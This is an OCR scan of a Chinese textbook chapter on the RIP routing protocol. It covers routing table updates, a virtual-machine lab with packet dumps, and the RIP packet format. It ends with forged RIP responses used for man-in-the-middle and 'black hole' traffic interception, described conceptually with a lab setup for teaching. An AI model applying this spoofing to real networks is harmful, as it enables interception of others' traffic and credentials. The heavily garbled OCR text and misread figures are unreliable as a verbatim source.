RIP 应 答 报 文 和 Rl 旧 的 路 由 表 应 用 Bellman-Ford 算法 。 因 为 RIP 应 答 中 没有 N1 的 路 
由 信息 ,因此 直接 采用 旧 路 由 表 中 的 N1 一 1 一 本 地 。 到 达 N2 的 两 条 路 由 的 下 一 跳 不 同 ， 
这 时 选择 跳 数 小 的 N2 一 1 一 本 地 。 旧 路 由 表 没 有 N3 的 路 由 信息 ,因此 采用 RIP 应 答 中 
的 N3 一 3 一 R2。 

从 R2 发 来 的 RIP 应 答 ”修改 后 的 RIP 应 答 


N2 2 一 N2 3 R2 

N3 2 N33R 

R1 的 旧 路 由 表 lL Ri 的 新 路 由 表 

了 NI 1 一 

N2 1 |c> | 更 新 算法 | 一 >| N2 1 一 
到 N3 3 R2 


图 5-10 RI1 更 新 自己 的 路 由 表 


R2 路 由 表 的 更 新 过 程 如 图 5-11 所 示 。 因 为 R2 旧 路 由 表 中 没有 N1 的 路 由 信息 , 因 
此 直接 采用 RIP 应 答 中 的 N1 一 3 一 R1。 到 达 N2 的 两 条 路 由 的 下 一 跳 不 同 ,这 时 选择 跳 
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数 小 的 N2 一 1 一 本 地 。RIP 应 答 中 没有 N3 的 路 由 信息 ,因此 采用 R2 旧 路 由 表 中 的 
N3 一 1 一 本 地 。 
从 R1 发 来 的 RIP 应 答 ”修改 后 的 RIP 应 答 


N1 2 一 N1 3 RIl 
E> 


N2 2 一 N2 3 RI 

R2 的 旧 路 由 表 lL 隘 由 靳 洁 由 用 
N2 1 Nl 3 Ri 
NB 1 -LY 1 一 


N3 1 一 


图 5-11 R2 更 新 自己 的 路 由 表 


第 一 轮 路 由 交换 之 后 的 路 由 表 如 图 5-12 所 示 。 


Nl 3 Rl 
N2 1 一 
N3 1 一 


R2 的 路 由 表 


NET2 NET4 
图 5-12 第 一 轮 路 由 交换 之 后 的 路 由 表 


R2 和 R3 是 同属 于 NET3 的 相 邻 路 由 器 ,它们 将 各 自 掌握 的 路 由 表 发 送 给 对 方 , 开 
始 第 二 轮 路 由 交换 。 图 5-13 给 出 的 是 R3 路 由 表 的 更 新 过 程 。 因 为 R3 旧 路 由 表 中 没有 
N1 和 N2 的 路 由 信息 ,因此 直接 采用 RIP 应 答 中 的 N1 一 4 一 R2、N2 一 3 一 R2。 到 达 N3 
的 两 条 路 由 的 下 一 跳 不 同 ,这 时 选择 跳 数 小 的 N3 一 1 一 本 地 。 因 为 RIP 应 答 中 没有 N4 
的 路 由 信息 ,因此 直接 采用 旧 路 由 表 中 的 N4 一 1 一 本 地 。 
从 R2 发 来 的 RIP 应 答 ”修改 后 的 RIP 应 答 


N1 3 RI N1 4 R2 
N22 一 |c>| N2 3 R2 
N3 2 一 WB 3 RB 
R3 的 新 路 由 表 
R3 的 旧 路 由 表 UL a 
N3 1 一 > N2 3 R2 
N4 1 一 更 新 算法 N3 1 一 
N4 1 一 


图 5-13 更 新 R3 的 路 由 表 
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图 5-14 给 出 的 是 R2 路 由 表 的 更 新 过 程 。 因 为 RIP 应 答 中 没有 N1 和 N2 的 路 由 信 
息 , 因 此 直接 采用 旧 路 由 表 中 的 N1 一 3 一 R1、N2 一 1 一 本 地 。 到 达 N3 的 两 条 路 由 的 下 一 
跳 不 同 ,这 时 选择 跳 数 小 的 N3 一 1 一 本 地 。 旧 路 由 表 没 有 N4 的 路 由 信息 ,因此 采用 RIP 
应 答 中 的 N4 一 3 一 R3 。 


从 R3 发 来 的 RIP 应 答 ”修改 后 的 RIP 应 答 


N3 2 一 N3 3 R3 
N4 2 YN 3 R3 
9 新 路 由 
R2 的 旧 路 由 表 几 了 2 用 新 中 由 表 
NI 3 RI 
NI 3 RI ND .全 
N2 1 一 | 呈 > | 更 新 算法 | 一 >| N3 1 
一 N4 3 R3 


图 5-14 更 新 R2 的 路 由 表 


第 二 轮 路 由 交换 之 后 的 路 由 表 如 图 5-15 所 示 。 


NET2 NET4 
图 5-15 第 二 轮 路 由 交换 之 后 的 路 由 表 


R2 将 自己 的 路 由 表 发 送 给 Rl 开始 第 三 轮 路 由 交换 ,如 图 5-16 所 示 。 因 为 旧 路 由 表 


没有 N4 的 路 由 信息 ,因此 采用 RIP 应 答 中 的 N4 一 4 一 R2。 
从 R2 发 来 的 RIP 应 答 ”修改 后 的 RIP 应 答 


Nl 3 Rl N1 4 R2 

N2 2 N2 3 R2 

N3 2 一 > N3 3 R2 

N4 3 R3 N4 4 R2 

RI 的 旧 路 由 表 I R1 的 新 路 由 表 
Nl 1 一 

0 N2 1 一 

N2 1 一 | 呈 > | 更 新 算法 | 一 >| N3 3 也 

N33 R2 N4 4 R2 

图 5-16 RI1 更 新 自己 的 路 由 表 
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第 三 轮 路 由 交换 之 后 的 最 终 形成 的 路 由 表 如 图 5-17 所 示 。 


NET1 NET3 


1188 


NET2 NET4 
图 5-17 第 三 轮 路 由 交换 之 后 的 最 终 路 由 表 


55 当 网 络 拓扑 变化 时 RIP 调整 路 由 表 的 


过 程 


当 网 络 的 拓扑 结构 发 生变 化 时 ,RIP 会 自动 调整 路 由 表 , 下 面 举例 说 明 。 如 图 5-18 
所 示 的 网 络 环境 中 ,NET2 和 R3 之 间 新 增加 一 条 链 路 ,这 条 链 路 导致 网 络 出 现 环 路 , 即 
到 达 同 一 目的 网 络 有 两 条 路 径 可 以 选择 ,RIP 会 自动 调整 路 由 表 , 选 择 一 条 跳 数 最 小 的 路 
径 ,下 面具 体 分 析 调整 过 程 。 


N1 3 RI 
N2 1 
N3 1 一 
N4 3 R3 
R2 的 路 由 表 
NETI1 NET3 
R2 N1 4 R2 
N2 3 R2 
N3 1 一 
N4 1 一 
R3 的 路 由 表 
192.1.1.0 2 
RI 的 路 出 家 192.3.3.0 
Ey NET2 人 NET4 


图 5-18 在 R3 和 N2 之 间 增 加 了 一 条 直 连 链 路 


由 于 增加 了 一 条 链 路 ,R3 的 路 由 表 中 到 达 N2 的 路 由 项 修改 为 本 地 直 连 路 由 : N2 
1 一 。R3 定期 将 自己 的 路 由 表 发 送 给 邻居 R1 和 R2。R3 发 出 的 RIP 响应 报 文 不 会 引 
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起 R2 路 由 表 的 变化 ,但 会 导致 R1 的 路 由 表 中 到 达 N4 的 路 由 项 N4 


N4 3 R3。 可 见 , 如 图 5-19 所 示 为 第 一 阶段 R3 将 路 由 表 发 送 给 R 


的 两 条 路 径 中 RIP 选择 了 跳 数 少 的 路 径 。 


RI 的 旧 路 


NETI 


192.1.1.0 


4 R2 修改 为 


2 和 Rl。 在 到 达 N4 


N1 5 R3 N1 4 R2 
N2 3 R3 |< N2 2 一 
N3 3 R3 N3 2 一 
N4 3 R3 N4 2 一 

修改 之 后 的 RIP 响 应 R3 的 RIP 响 应 

NET3 


N1 
N2 
N3 
N4 


4 R2 
1 一 


NET2 
图 5-19 第 一 阶段 R3 将 路 由 表 发 送 给 R2 和 R1 


R3 的 路 由 表 


192.3.3.0 


NET4 


R1 定期 会 将 自己 的 路 由 表 发 送 给 邻居 R2 和 R3, 同 样 这 个 响应 报 文 不 会 引起 R2 路 
由 表 的 变化 ,但 会 引起 R3 路 由 表 的 变化 。R3 路 由 表 中 到 达 N1 的 路 由 项 由 N1 4 R2 
调整 为 N1 3 R1。 至 此 路 由 表 调 整 结束 ,路 由 表 中 保存 的 都 是 跳 数 最 小 的 路 由 项 。 

如 图 5-20 所 示 为 第 二 阶段 R1 将 路 由 表 发 送 给 R2 和 R3。 


Nl 2 一 
N2 2 一 
N3 3 R2 
N4 3 R3 


N1 3 RI 


» N2 3 RI 
N3 


4 RIl 
N4 4 RI 


R1 的 RIP 响 应 ”修改 之 后 的 RIP 响 应 


NI 1 
N2 1 
N3 3 
N4 3 
R1 的 旧 路 


NETI 


NI1 3 RI 
Na 
N3 1 = 
N4 3 R3 


R2 的 路 由 表 


192.1.1.0 


NET3 


NET2 
图 5-20 第 二 阶段 R1 将 路 由 表 发 送 给 R2 和 R3 


NI1 3 RI 
N2 1 一 
N3” 二 三 
N4 1 一 
R3 的 新 路 由 表 
N1 4 R2 
N2 1 一 
N3 1 一 
N4 1 一 
R3 的 旧 路 由 表 

192.3.3.0 

NET4 
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局 全 利用 RIP 组 建 网 络 


为 了 进一步 验证 RIP 路 由 表 的 生成 方法 ,按照 如 图 5-21 所 示 网 络 拓扑 搭建 一 个 实际 
的 网 络 环境 ,使 用 虚拟 机 来 模拟 路 由 器 ,在 路 由 器 上 开启 RIP, 查 看 生成 的 路 由 表 。 网 络 
地 址 和 路 由 器 的 接口 IP 地 址 分 配 情况 如 图 5-21 所 示 。 


NETI1 192.2.2.1 NET3 


10.1.1.1 


RI 192.1.1.1 R3 192.3.3.1 
NET2 NET4 


图 5-21 实验 环境 


本 实验 环境 采用 具有 多 网 卡 的 Windows 2000 虚拟 机 模拟 路 由 器 组 建 ,具体 步 又 
如 下 。 

第 一 步 : 配置 各 个 对 象 的 地 址 信息 。 

以 host-only 方式 启动 三 台 Windows 2000 虚拟 机 ,分 别 代 表 R1、R2 、R3 ,参照 图 5-21 
配置 各 个 对 象 的 IP 地 址 。 注 意 : 本 机 扮演 接 入 192. 3. 3.0 网 络 的 一 台 主 机 ,用 于 测试 ， 


IP 地 址 为 192. 3. 3. 20, 网 关 设 置 为 192. 3. 3. 1。 每 台 路 由 器 的 地 址 信息 如 图 5-22 一 
图 5-25 所 示 。 
Ethernet adapter 下 邢 乏 梭 2: 
Description . . 。 .. 。 . : AMD PCNET Family PCI Ethernet hdapter #2| 
Physical hddress- . - . . : 88-8C-29-C3-5D-ED 
DHCP Enabled. - - - - - - :No 
IP hddress- . - - - 。 。 - : 192.1.1.1 


Ethernet adapter 本 地 连接 : 


Description . - - - - 。 - : AMD PCNET Family PCI Ethernet hdapter 
Physical hddress- . - . - : 88-8C-29-C3-5D-E3 

DHCP Enabled. - - - - - - :No 

IP hddress- - - - - - - - :18.1.1.1 


Subnet Mask . - - - - - - : 255.255.255.8 


图 5-22 RI1 的 地 址 信息 


第 二 步 : 为 三 台 路 由 器 开启 RIP 路 由 功能 ,实验 网 络 间 的 通信 。 
本 次 实验 使 用 了 4 个 网 络 ,为 了 实现 网 络 间 的 连通 ,需要 在 三 台 路 由 器 上 开启 路 由 功 
能 ,这 里 选择 RIP 实现 网 络 连通 。 以 R1 为 例 介绍 RIP 路 由 的 开通 方法 : 在 路 由 与 远程 
访问 界面 右 击 IP 路 由 选择 下 面 的 “常规 ”> 选择 “新 路 由 选择 协议 ”> 选中 “路 由 信息 协议 
(CRIP) ”一 右 击 RIP 一 选择 “新 接口 "一 选中 “本 地 连接 ”一 单 击 “ 确 定 ” 按 钮 。 再 按照 同样 
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thernet adapter 五 
Description . . - . . . : AMD PCNET Family PCI Ethernet hdapter #2 
Physical hddress- . - - : 88-8C-29-A3-78-45 
DHCP Enabled- - - - - - : No 
IP hddress- - - - - - - : 192.2.2.1 
Subnet Mask - - - - - - : 255.255.255.8 


Default Gateway - - - - 


thernet adapter 本 地 连接 : 


Description . 。 - 。 - - 
Physical hddress- - - - 


AMD PCNET Family PCI Ethernet hdapter 
86-BC-29-h3-78-48 


DHCP Enabled. - - - - - No 
IP Nddress ss ss 192.1.1.2 
Subnet Mask . - - - - - 255.255.255.8 


Default Gateway - - - - 


图 5-23 R2 的 地 址 信息 


FEhernet adapter Ei 


Description . . . . . . : AMD PCNET Family PCI Ethernet hdapter #3 
Physical hddress- . - - 868- BC-29-66-87-61 

DHCP Enabled. - - - - - No 

TP MMOs sa. a a a a 192.3.3.1 


Subnet Mask . - - . - 。 : 255.255.255.8 
Default Gateway - - - -. : 


Ethernet adapter 本 地 连接 2: 


Description . . . . . . : AMD PCNET Family PCI Ethernet hdapter #2 
Physical hddress- . . . : 88-8C-29-66-87-57 

DHCP Enabled. . - . .. :No 

IP hddress- . - - - - . : 192.2.2.2 

Subnet Mask . - - . - - : 255.255.255.8 


Default Gateway . . - . 


图 5-24 R3 的 地 址 信息 


Ethernet adapter 


Description . . - UMware Virtual Ethernet hdapter for UMnet1 
Physical Address. 99-569-56-C9-69-691 


Dhcp Enabled. . No 

IP Address. . 192.3.3.28 
Subnet Mask - 255.255.255.08 
Default Gatewal 192.3.3.1 


图 5-25 本 机 的 地 址 信息 


的 步骤 添加 本 地 连接 2。 
开通 RIP 路 由 之 后 ,在 三 台 路 由 器 上 可 以 查看 到 4 个 网 络 的 路 由 信息 , 见 图 5-26 一 
图 5-28。 可 以 发 现 三 个 路 由 表 与 之 前 的 计算 结果 一 致 。 


睛 标 | 网 络 挤 码 | 网 关 | 跃 点 数 | 通信 协议 _ 


255.255.255.255 255.255.255.255 192.1.1.1 1 本 地 
255. 255. 255. 255 255.255.255.255 10.1.1.1 1 本 地 
224.0.0.0 240.0.0.0 192.1.1.1 1 本 地 
224.0.0.0 240.0.0.0 10.1.1.1 1 本 地 
192.3.3.0 255. 255. 255.0 192.1.1.2 4 RP 了 4 4 R2 
192.2.2.0 255. 255. 255. 0 192.1.1.2 3 RF 了 3 BZ 
192.1.1.1 255. 255. 255.255 127.0.0.1 1 下 型 
192.1.1.0 255. 255. 255.0 192.1.1.1 1 本 地 到 1 一 
127.0.0.1 255. 255. 255. 255 127.0.0.1 1 二 再 
127.0.0.0 255.0.0.0 127.0.0.1 1 本 地 
10. 255. 255. 255 255.255.255.255 10.1.11 1 本 地 
10.1.1.1 255.255.255.255 127.0.0.1 1 本 地 
10.1.1.0 255. 255. 255.0 10111 1 本 地 本 1 一 


图 5-26 RI 的 路 由 表 
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255. 255. 255. 255 。 255. 255. 255. 255 192.2.2.1 1 本 地 
255. 255. 255. 255 。 255. 255. 255. 255 192.1.1.2 1 本 地 
224.0.0.0 240.0.0.0 192.2.2.1 1 本 地 
224.0.0.0 240.0.0.0 192.1.1.2 1 本 地 
192.3.3.0 255.255. 255.0 192.2.2.2 3 BP MN 3 B3 
192.2.2.1 255. 255. 255. 255 127.0.0.1 1 EE 
192.2.2.0 255. 255. 255.0 192.2.2.1 是 本 地 了 1 一 
192.1.1.2 255. 255. 255. 255 127.0.0.1 : 二 再 
192.1.1.0 255. 255. 255.0 192.1.1.2 1 本 地 取 1 一 
127.0.0.1 255. 255. 255. 255 127.0.0.1 1 本 更 
127.0.0.0 255.0.0.0 127.0.0.1 1 本 地 
10.1.1.0 255. 255. 255.0 192.1.1.1 3 RP MW 3 Rl 


, 255. 
. 255. 
.0.0. 
.0.0. 
3.3. 
.3.3. 
囊 - 查 - 沁 
上 芽 汪 
也 
.0.0. 
.0.0. 


BSIRBRSIRSIRNRNN 
ReelslseleeRwne 
Reslslseloeesnwne 
bho bn 


图 5-28 R3 的 路 由 表 


第 三 步 : 验证 数据 报 的 传输 路 径 。 

在 本 机 执行 dos 命令 : ping 10.1.1.1( 即 Rl 路 由 器 在 NET1l 网 络 的 接口 IP 地 址 ) 。 
因为 本 机 的 IP 地 址 为 192. 3. 3. 20, 位 于 NET4 网 络 , 按 照 各 台 路 由 器 的 路 由 表 可 以 得 
知 ,本 机 发 出 的 数据 报 将 沿 着 本 机 一 R3 一 R2 一 R1 的 路 径 传递 ,这 个 IP 数据 报 在 传递 过 
程 中 源 和 目的 MAC 地 址 在 不 断 变 化 , 源 和 目的 IP 地 址 没有 变化 ,每 经 过 一 台 路 由 器 , 数 
据 报 的 TTL 值 减 1,IP 首部 校 验 和 重新 计算 。 下 面 在 本 机 运行 Sniffer Pro 捕获 本 机 发 
出 的 IP 数 据 报 ,验证 报 文 的 传输 路 径 , 如 图 5-29 一 图 5-31 所 示 。 


R3 在 NET4 的 接口 MAC 本 机 的 MAC 


00000000: 00 0c 29|66 07 61 00 50 56|c0 00 01 08 00 45 00 ..)f.a.PY?... E. 
00000010: 00 3c 02 cc 00 00 80 01 69 de c0 03 03 14 0a 01 .<.?.¢.i 节 . 


00000020:; 08 00 47 Sc 02T00 04105 61 62[63 64 65 66 ....G\....abcdef 
00000030: 67|68 69 6a 6b 6c 6dl6e 6f |70 71 72|73 74 75 76 ghijklmopqrstuv| 
00000040: 77|61 62 63 64 65 66|67 68169 wabcdef ghi 


10: 1 1:1 TTL=128 ” 校 验 和 192. 3. 3. 20 


图 5-29 本 机 发 给 R3 的 IP 数据 报 


R22 在 NET3 的 磋 口 MAC R3 在 号 T3 的 孜 口 MAC 
0000000: 00 0c 29|a3 70 45 00 0c 29|66 07 57 08 00 45 00 ..) E..)f.W..E. 
0000010: 00 3c 02 cc 00 00 ?7f 01 6a de c0 03 03 14 0a 01 .<.?.1.]j 节 ...,. 
0000020: 01 01 08 00 47 Sc ss 04|00 61 62|63 64 65 66 ..G\... .abcdef 


0000030: 67|68 69 6a 6b 6c 6d| be 6f|70 71 72|73 74 75 76 ghijklmopqrstuv 
0000040: 77|61 62 63 64 65 66|167 68169 wabcdef ghi 
10: 1.1.1 TTL=127 _ 校 验 和 192. 3. 3. 20 


图 5-30”R3 转发 给 R2 的 IP 数据 报 


Ri 在 下 ET2 的 接口 MAC R2 在 NET2 的 可 MAC 


0000000: 00 Dc 29|c3 sd ed 00 0c 29|a3 70 40 08 00 45 00 ep ! .i i Hg 

0000010: 00 3c 02 cc 00 00 7e 01 6b dc c0 03 03 14 0a 01 .<.?.~.k 贡 

0000020: 01 01 08 00 47 Sc 02|00 04|00 61 62|63 64 65 66 GN\ abcdef 

0000030: 67|68 69 6a 6b 6c 6dl6e 6f|70 71 72173 74 75 76 ghijklmnopqrstuwl 

0000040: 77|61 62 63 64 65 66|67 68|69 wabcdef ghi 
10.1.1.1 TIL=126_ 校 验 和 192. 3. 3. 20 


图 5-31 R2 转发 给 Rl 的 IP 数据 报 
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“5.7 ”RIP 数据 报 的 格式 


RIP 数据 报 的 格式 如 图 5-32 所 示 。 每 行 占 4 字 节 ,第 一 行 是 首部 ,其 后 是 若干 条 路 


一 ea 
地 址 标识 


由 项 ,每 个 路 由 项 20 字 节 ,最 多 不 超过 25 项 。 各 字 
段 含义 如 下 。 
命令 (1 字 节 ): 取 值 为 1 或 2,1 表示 这 是 一 个 


RIP 请 求 报 文 ,2 表示 这 是 一 个 RIP 响应 报 文 。 he 
版 本 号 (1 字 节 ): 代表 RIP 的 版 本 号 ,目前 这 个 

字段 值 为 2, 代 表 第 二 版 的 RIP 协议 。 
地 址 标识 (2 字 节 ): 对 于 IP 路 由 项 这 个 字段 设 图 5-32 ”RIP 数据 格式 


置 为 2。 

图 5-33 给 出 的 是 一 个 完整 的 RIP 数据 报 , 由 于 RIP 响应 报 文 需要 发 送 给 所 有 的 邻 
居 , 因 此 数据 报 的 目的 MAC 地 址 设置 为 广播 地 址 FF-FF-FF-FF-FF-FF, 目 的 IP 设置 为 
广播 IP: 50. 1.1.255, 这 样 一 来 ,所 有 的 邻居 都 会 收 到 这 个 响应 。 


FF.FF.FF.FF.FF.FF 520 520 
source MAC length check 


0x45| 0 length 2 这 0 一 一 header 
id flag 2 0 
[TTL[17 | check 10.1.1.0 
source IP 255.255.255.0 路 由 信息 
50.1.1.255 | | 个 
Metric=3 
2 0 
60.1.1.0 
电信 
255.255.255.0 i 有 
192.1.1.1 
Metric=5 


图 5-33 ”RIP 数据 报 举例 


RIP 在 传输 层 使 用 UDP, 它 使 用 UDP 的 520 端口 , 且 源 和 目的 端口 均 为 520。 应 用 
层 携 带 的 就 是 RIP 响应 报 文 ,其 中 包含 两 条 路 由 项 。 第 一 条 表示 目的 网 络 地 址 为 10. 1. 
1.0, 下 一 跳 是 192. 1. 1. 1, 跳 数 为 3。 第 二 条 表示 目的 网 络 地 址 为 60.1.1.0, 下 一 跳 是 
192. 1.1.1, 跳 数 为 5。 
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5 .8 RIP 路 由 欺骗 


58.1 基于 RP 欺骗 的 “中 间 人 ”攻击 


如 图 5-34 所 示 ,攻击 者 的 目的 是 要 截获 Nl1 和 N2 之 间 的 通信 数据 ,采用 的 办 法 是 通 
过 发 送 伪造 的 RIP 应 答 报 文 刷 新 Rl1 和 R2 的 路 由 表 , 将 R1 路 由 表 中 N3 的 下 一 跳 改 为 
HH, 将 R2 路 由 表 中 N1 的 下 一 跳 改 也 为 H。 这 样 一 来 ,Nl 和 N2 之 间 的 通信 数据 都 将 转 


发 给 H。 
R1 的 路 由 表 R2 的 路 由 表 
NIL 1 一 NI 3 RI 
N2 1 一 N2 1 一 
N3 3 R2 N3 1 一 


hacker 


图 5-34 基于 RIP 欺骗 的 "中间人 ”攻击 


RIP 路 由 器 每 隔 固定 的 时 间 间 隔 就 会 向 临近 的 其 他 路 由 器 发 送 自己 的 路 由 表 , 路 由 
器 会 根据 收 到 的 RIP 应 答 报 文 和 Bellman-Ford 算法 来 更 新 自己 的 路 由 表 。 攻 击 者 正 是 
利用 这 种 机 制 来 实现 RIP 路 由 欺骗 , 它 首 先 发 布 一 条 伪造 的 RIP 应 答 报 文 给 R1, 声 称 自 
己 有 一 条 到 达 NET3 的 直接 链 路 ,其 跳 数 为 1。R1 收 到 这 个 通告 报 文 后 会 更 新 自己 的 路 
由 表 , 将 NET3 的 下 一 跳 路 由 器 改 为 攻击 者 再 , 跳 数 为 2( 应 用 Bellman-Ford 算法 )。 

如 图 5-35 所 示 ,R1l 收 到 这 个 伪造 的 RIP 应 答 报 文 之 后 应 用 Bellman-Ford 算法 首先 
将 跳 数 加 1。 由 于 RIP 应 答 报 文 和 R1 的 旧 路 由 表 均 包含 到 N3 的 路 由 信息 并 且 下 一 跳 
地 址 不 同 , 这 时 选择 跳 数 小 的 ,因此 采用 RIP 应 答 报 文中 的 路 由 信息 。R1 更 新 之 后 的 路 
由 表 如 图 5-35 所 示 ,可 见 这 时 发 往 N3 的 数据 将 被 提交 给 五。 

同样 ,攻击 者 发 布 一 条 伪造 的 RIP 应 答 报 文 给 R2 ,声称 自己 有 一 条 到 达 NET1 的 直 
接 链 路 ,其 跳 数 为 1。R2 收 到 这 个 通告 报 文 后 会 更 新 自己 的 路 由 表 , 将 NETI1 的 下 一 跳 
路 由 器 改 为 攻击 者 匡 , 跳 数 为 2。 

如 图 5-36 所 示 ,R2 收 到 这 个 伪造 的 RIP 应 答 报 文 之 后 应 用 Bellman-Ford 算法 首先 
将 跳 数 加 1。 由 于 RIP 应 答 报 文 和 有 2 的 旧 路 由 表 均 包含 到 N1 的 路 由 信息 并 且 下 一 跳 
地 址 不 同 , 这 时 选择 跳 数 小 的 ,因此 采用 了 RIP 应 答 报 文中 的 路 由 信息 。R2 更 新 之 后 的 路 
由 表 如 图 5-36 所 示 ,可 见 这 时 发 往 N1 的 数据 将 被 提交 给 联 。 至 此 ,R1 和 R2 的 路 由 表 
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伪造 的 RIP 应 答 。 ”修改 后 的 RIP 应 答 


[3 1 [N32 H 

R1 的 旧 路 由 表 几 R1 的 新 路 由 表 
N1 1 一 N1 1 一 
N2 1 一 | 一 ->| 更 新 算法 I 于 IN2 1 一 
N3 3 R2 N3 2 H 


图 5-35 利用 伪造 的 RIP 应 答 更 新 R1 的 路 由 表 
都 按照 攻击 者 的 意图 进行 了 刷新 。 


伪造 的 RIP 应 答 。 ”修改 后 的 RIP 应 答 


| NIL 1 HISIN 2 H 

R2 的 旧 路 由 表 lL R2 的 新 路 由 表 
N1 3 RI N11 2 H 
N2 1 一 | 一 > | 更 新 算法 IIN2 1 一 
N3 1 一 N3 1 一 


图 5-36 ”利用 伪造 的 RIP 应 答 更 新 R2 的 路 由 表 


RIP 路 由 欺骗 成 功 实施 之 后 的 路 由 表 如 图 5-37 所 示 , 此 时 NET1 和 NET3 之 间 的 通 
信和 数据 经 过 hacker 中 转 。 


R1 的 路 由 表 R2 的 路 由 表 
Nl 1 一 NI 2 H 
NY 二 N2 1 一 
N3 2 H N3 1 一 


~ 
吧 一 


#” router2 


hacker 


图 5-37 攻击 成 功 之 后 的 路 由 表 


582 “黑洞 ”攻击 


基于 RIP 的 “中 间 人 ?攻击 能 够 成 功 实施 的 关键 条 件 是 攻击 者 主机 所 在 的 网 络 上 至 
少 存在 两 台 路 由 器 。 在 如 图 5-38 所 示 的 网 络 环境 中 ,hacker 主机 连接 的 NET1 只 有 一 台 
路 由 器 routerl ,因而 在 这 种 环境 下 hacker 无 法 实施 “中 间 人 ”攻击 ,但 可 以 进行 “黑洞 ” 攻 
击 。“ 黑 洞 ” 攻 击 就 是 改变 网 络 数据 正常 的 传输 流向 ,将 网 络 数据 吸引 到 hacker 主机 的 一 
种 攻击 行为 。 利 用 “黑洞 ”攻击 可 以 窃取 通信 数据 中 的 敏感 内 容 ( 例 如 账户 、 密 码 ), 也 可 以 
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造成 受害 者 主机 断 网 。 


R3 的 路 由 表 


N1 4 R2 

N2 3 R2 

N3 1 一 
+ * R 


router3 


RI 的 路 由 表 


R2 的 路 由 表 
NlL 1 一 routerl NI1 3 RI 
N2 1 一 N2 1 一 
N3 3 R2 N3 1 一 
* * R2 router2 * 本 R3 


hacker 


图 5-38 测试 环境 


如 图 5-39 所 示 ,hacker 要 将 NET1 NET2 和 NET3 网 络 发 给 sina 网 段 的 数据 报 都 
吸引 过 来 ,于 是 在 NETI1 广播 一 条 伪造 的 RIP 响应 报 文 ,声称 自己 与 sina 网 段 之 间 拥 有 
一 条 直 连 链 路 。 如 图 5-39 所 示 ,这 条 伪造 路 由 很 快 会 扩散 到 routerl 、router2 和 router3， 
在 每 台 路 由 器 的 路 由 表 中 添加 一 条 到 达 sina 网 段 的 路 由 信息 ,下 一 跳 均 为 HH, 这 导致 
NET1~NET3 网 络 此 后 发 给 sina 网 段 的 数据 报 都 传递 给 hacker 主机 。 


R3 的 路 由 表 


router3 
Internet | 
R1 的 路 由 表 Cw) Cn ) R2 的 路 由 表 


Nl 1 一 routerl N1 3 RI 
N2 1 一 ~ N2 1 一 
~ 
N3 3 R2 Nt 一 
S 3 了 router2 S 4 RIl 
* * R2 * 本 R3 
hacker = * 


H 发 布 伪造 的 RIP 应 答 


图 5-39 “黑洞 ?攻击 
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当 hacker 要 停止 攻击 时 ,只 要 停止 发 送 伪造 的 RIP 响应 报 文 ,一 段 时 间 之 后 routerl 一 
router3 路 由 表 中 的 伪造 路 由 会 自动 老化 .失效 ,攻击 也 就 自动 终止 ,网 络 恢复 正常 状态 。 
因而 这 种 攻击 的 启动 .停止 都 非常 方便 。 


“5.9 基于 RIP 路 由 欺骗 的 网 络 监听 


591 测试 环境 


本 实验 设计 了 三 个 网 络 ,网 络 地 址 分 别 为 70. 1. 1.0、61.1.1.0 和 50.1.1.0, 使 用 两 
台 Windows 2000 虚拟 机 作为 路 由 器 连接 这 三 个 网 络 。Windows XP 虚拟 机 作为 Web 服 
务 器 运行 “中 网 景 论坛 "Windows 2000 虚拟 机 2 作为 攻击 者 .本 机 作为 受害 者 。 各 个 对 
象 的 地 址 信息 如 图 5-40 所 示 。 


Web 服 务 器 受害 者 
Windows XP 70.1.1.2 本 机 61.1.1.2 
虚拟 机 00-0c-29-D8-72-73 00-50-56-c0-00-01 
70.1.1.1 61.1.1.1 
00-0c-29-c3-5d-ed 00-0c-29-A3-70-45 
ee Windows 
Windows 2000 虚 拟 机 1 路 由 器 1 2000 虚 拟 机 3 路 由 器 2 
50.1.1.4 50.1.1.20 
00-0c-29-c3-5d-e3 00-0c-29-A3-70-40 


Windows 2000 虚 拟 机 2 50.1.1.10 
00-0c-29-A3-70-3B 


攻击 者 
图 5-40 实验 环境 


592 测试 目的 


攻击 者 向 路 由 器 1 发 送 RIP 欺骗 报 文 ,将 去 往 61. 1. 1.0 网 络 的 路 由 信息 的 下 一 跳 
地 址 改 为 攻击 者 IP。 攻 击 者 再 向 路 由 器 2 发 送 RIP 欺骗 报 文 ,将 去 往 70. 1. 1.0 网 络 的 
路 由 信息 的 下 一 跳 地 址 也 改 为 攻击 者 IP。 这 样 一 来 ,70. 1. 1.0 和 61. 1.1.0 网络 之 间 的 
通信 数据 将 经 过 攻击 者 主机 中 转 , 攻 击 者 可 以 从 中 提取 出 敏感 信息 ,如 图 5-41 所 示 。 


593 测试 步骤 


第 一 步 : 配置 各 个 对 象 的 地 址 信息 。 
以 host-only 方式 启动 Windows XP 虚拟 机 和 Windows 2000 虚拟 机 2, 参 照 图 5-40 
配置 各 个 对 象 的 IP 地 址 ,注意 ,Windows XP 虚拟 机 的 网 关 设 置 为 70.1.1.1, 本 机 的 网 关 
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cn 

Ee 

路 由 器 1 ~、、 
Se 


攻击 者 
图 5-41 RIP 路 由 欺骗 攻击 


设置 为 61.1.1.1。 

第 二 步 : 为 Windows 2000 虚拟 机 1 和 Windows 2000 虚拟 机 3 各 增加 一 块 网 卡 并 
配置 地 址 。 

在 本 次 实验 中 ,Windows 2000 虚拟 机 1 和 Windows 2000 虚拟 机 3 扮演 路 由 器 , 因 
此 需要 为 它们 各 添加 一 块 新 的 网 卡 。 在 虚拟 机 处 于 关闭 的 状态 下 , 单 击 虚拟 机 一 选择 “ 设 
置 ?一 在 “硬件 ?选项 卡 下 单 击 * 添 加 ”按钮 一 选择 网 卡 一 单 击 “* 添 加 ?按钮 。 启 动 虚拟 机 ,在 
网 上 邻居 里 可 以 看 到 新 添加 的 网 卡 。 为 两 台 虚 拟 机 参照 图 5-41 配置 接口 IP 地 址 。 

第 三 步 : 为 两 台 路 由 器 开启 RIP 路 由 功能 ,实验 网 络 间 的 通信 。 

本 次 实验 使 用 了 三 个 网 络 , 为 了 实现 网 络 间 的 连通 ,需要 在 两 台 路 由 器 上 开启 路 由 功 
能 ,这 里 选择 RIP 实现 网 络 连 通 。 开 通 RIP 路 由 之 后 ,在 两 台 路 由 器 上 可 以 查看 到 三 个 
网 络 的 路 由 信息 , 见 图 5-42 和 图 5-43。 


C:\netstat —r 


Route Table 


HS TCP 和 interface 
AND PCNET Family Ethernet Adapter 
AND PCNET Family Ethernet Adapter 


Oxl 
0x4000004 
0x5000003 


00 0c 29 c3 5d e3 . 
00 0c 29 c3 5d ed . 


te: 
